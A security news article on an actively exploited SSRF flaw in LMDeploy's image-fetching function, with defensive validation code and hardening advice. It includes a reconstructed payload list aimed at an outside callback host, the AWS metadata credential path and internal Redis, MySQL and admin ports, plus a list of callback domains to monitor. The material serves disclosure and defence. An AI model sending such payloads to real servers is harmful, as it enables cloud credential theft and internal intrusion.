LMDeploy LLM Engine SSRF (CVE-2026-33626) Exploited Within 12 Hours
A newly disclosed Server-Side Request Forgery flaw in the LMDeploy LLM inference-serving toolkit is already under active exploitation, with attackers using a vision-language-module endpoint as an SSRF primitive to probe AWS IMDS, internal databases, and admin planes within minutes of patch availability.
SHANGHAI, CHINA — The window between a vulnerability disclosure and its first real-world exploitation is collapsing. In the case of CVE-2026-33626, a high-severity flaw in the open-source LMDeploy toolkit, that window was just 12 hours and 31 minutes.
Researchers from Sysdig Threat Research observed the first exploitation attempts against honeypots shortly after the GitHub Security Advisory (GHSA) went live on April 22. The speed of the attack suggests that threat actors are no longer waiting for public Proof-of-Concept (PoC) code; instead, they are using advisory text as a blueprint to build their own exploits in near real-time.
The Vision-Language Primitive
The vulnerability (CVSS 7.5) resides in LMDeploy’s vision-language module — specifically within the load_image() function in lmdeploy/vl/utils.py. The function was designed to fetch images from URLs for model processing but failed to validate whether those URLs pointed to internal or private IP addresses.
By sending a specially crafted request to an exposed LMDeploy inference endpoint, an attacker can turn the AI server into a proxy. This creates a powerful Server-Side Request Forgery (SSRF) primitive, allowing the attacker to "see" and interact with the internal network from the perspective of the trusted inference node.
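The missing check is straightforward to sketch. The snippet below is a minimal illustration of the kind of validation `load_image()` lacked, not LMDeploy's actual fix: it resolves the requested hostname and rejects any URL that lands on a loopback, link-local (which covers IMDS at `169.254.169.254`), private, or reserved address. A production implementation would also need to re-validate after HTTP redirects and pin the resolved IP to defend against DNS rebinding.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_image_url(url: str) -> bool:
    """Reject image URLs that resolve to internal address space.

    Illustrative sketch only: real deployments must also re-check
    redirect targets and pin the resolved IP (DNS rebinding).
    """
    parsed = urlparse(url)
    # Only plain HTTP(S) fetches with a hostname are acceptable.
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        # Blocks 127.0.0.0/8, 169.254.0.0/16 (IMDS), RFC 1918 ranges, etc.
        if ip.is_loopback or ip.is_link_local or ip.is_private or ip.is_reserved:
            return False
    return True
```

With a check like this in the fetch path, the IMDS and `localhost` probes described below would fail before any internal request is issued.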
Anatomy of an 8-Minute Intrusion
During the observed exploitation window, the attacker followed a classic cloud post-exploitation playbook tailored for the AI stack:
- Egress Confirmation: The attacker initiated an out-of-band (OOB) DNS callback to a service like `requestrepo.com` to confirm the SSRF was working and that the server could communicate with the outside world.
- Cloud Metadata Theft: The attacker immediately targeted the AWS Instance Metadata Service (IMDS) at `169.254.169.254`. This is a primary target for harvesting IAM credentials and cloud environment details.
- Internal Port Sweeping: In a rapid sweep, the attacker probed `localhost` and local network segments for common administrative services, including:
  - Redis & MySQL: Targeting internal data stores for potential exfiltration.
  - Admin HTTP Planes: Searching for unauthenticated internal dashboards on ports like `8080` or `80`.
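The probe sequence above can be reconstructed as a list of SSRF targets wrapped in an OpenAI-style chat request. Note the endpoint shape, JSON field names, and the `attacker-id` callback subdomain here are assumptions for illustration; they are not taken from the actual exploit traffic or LMDeploy's API schema.

```python
# Targets in the order observed: egress check, IMDS, then internal sweep.
TARGETS = [
    "http://attacker-id.requestrepo.com/",           # OOB egress confirmation
    "http://169.254.169.254/latest/meta-data/iam/",  # AWS IMDS credential theft
    "http://127.0.0.1:6379/",                        # Redis
    "http://127.0.0.1:3306/",                        # MySQL
    "http://127.0.0.1:8080/",                        # internal admin HTTP plane
]

def build_payloads(targets):
    """Wrap each internal URL in a chat-style body that would reach an
    image-fetching code path such as load_image() (field names assumed)."""
    return [
        {"messages": [{"role": "user",
                       "content": [{"type": "image_url",
                                    "image_url": {"url": target}}]}]}
        for target in targets
    ]
```

Each payload is an otherwise ordinary inference request; only the embedded URL distinguishes it from legitimate traffic, which is why egress controls (below) matter more than request-level signatures.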
The CyberSignal Analysis: Strategic Signals
Signal 01 — The Demise of the Patch Cycle
The 12-hour exploitation window for CVE-2026-33626 renders traditional "Patch Tuesday" cadences obsolete. For organizations deploying AI infrastructure, a new advisory must now be treated as an immediate remediation event. Attackers are effectively "reverse-engineering" advisories into exploits before many security teams have even triaged the alert.
Signal 02 — AI Endpoints as High-Value Proxies
Inference engines like LMDeploy are designed to be user-facing, often integrated into chat UIs or API clients. Because they require broad network access to fetch model weights from S3 and ship logs to a central server, they are perfect SSRF jump-points into a cloud environment.
Signal 03 — The "Blueprinting" Trend
The absence of a public PoC at the time of exploitation confirms that sophisticated actors are increasingly independent. By analyzing the GitHub diffs and advisory descriptions, they can weaponize a flaw like CVE-2026-33626 at scale before exploit code ever circulates publicly.
Defender Guidance: Tactical Mitigation & Hardening
While immediate patching to v0.12.3 is the primary directive, the speed of exploitation for CVE-2026-33626 necessitates a "Defense in Depth" approach. Because the vision-language module acts as an SSRF primitive, defenders should implement the following environmental controls:
- Enforce IMDSv2: If running on AWS, transition all inference nodes to Instance Metadata Service Version 2 (IMDSv2) with a hop limit of 1. This prevents the classic "one-shot" credential theft seen in this incident by requiring a session-oriented `PUT` request that SSRF primitives often cannot easily replicate.
- Egress Filtering (Allow-listing): Inference engines are often over-permissioned. Restrict outbound traffic from LMDeploy nodes to a strict allow-list of model artifact repositories (e.g., specific S3 buckets) and logging endpoints. Explicitly block access to the loopback address (`127.0.0.1`) and private IP ranges (`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) at the host firewall or security group level.
- Network Namespace Isolation: Run LMDeploy within a containerized environment (such as Docker or Kubernetes) using a non-default bridge network. Ensure the container does not have access to the host's networking stack (`--net=host` should be strictly forbidden).
- OAST Monitoring: Monitor network telemetry for requests to known Out-of-Band Application Security Testing (OAST) domains (e.g., `interactsh`, `burpcollaborator`, `requestrepo`). The 8-minute intrusion sequence showed that attackers use these for reachability confirmation before moving to credential theft.
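The OAST-monitoring control can be prototyped as a simple scan over DNS query logs. The log line format and the exact domain suffixes below are illustrative assumptions; tune both to your resolver's logging and a maintained OAST domain feed.

```python
# Callback-service suffixes to flag (illustrative; extend from a curated feed).
OAST_SUFFIXES = (
    ".requestrepo.com",
    ".burpcollaborator.net",
    ".interact.sh",
)

def flag_oast_queries(dns_log_lines):
    """Return queried domains matching known OAST callback suffixes.

    Assumes the queried domain is the last whitespace-separated field
    on each log line, possibly with a trailing dot (BIND-style logs).
    """
    hits = []
    for line in dns_log_lines:
        fields = line.split()
        if not fields:
            continue
        domain = fields[-1].rstrip(".").lower()
        if domain.endswith(OAST_SUFFIXES):
            hits.append(domain)
    return hits
```

Because the observed intrusion used an OOB callback as its very first step, alerting on these lookups from inference nodes can surface an SSRF attempt minutes before any credential theft occurs.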